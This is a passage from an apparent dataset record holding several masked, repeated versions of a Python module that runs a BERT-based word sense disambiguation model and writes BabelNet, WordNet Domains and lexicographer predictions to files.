Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 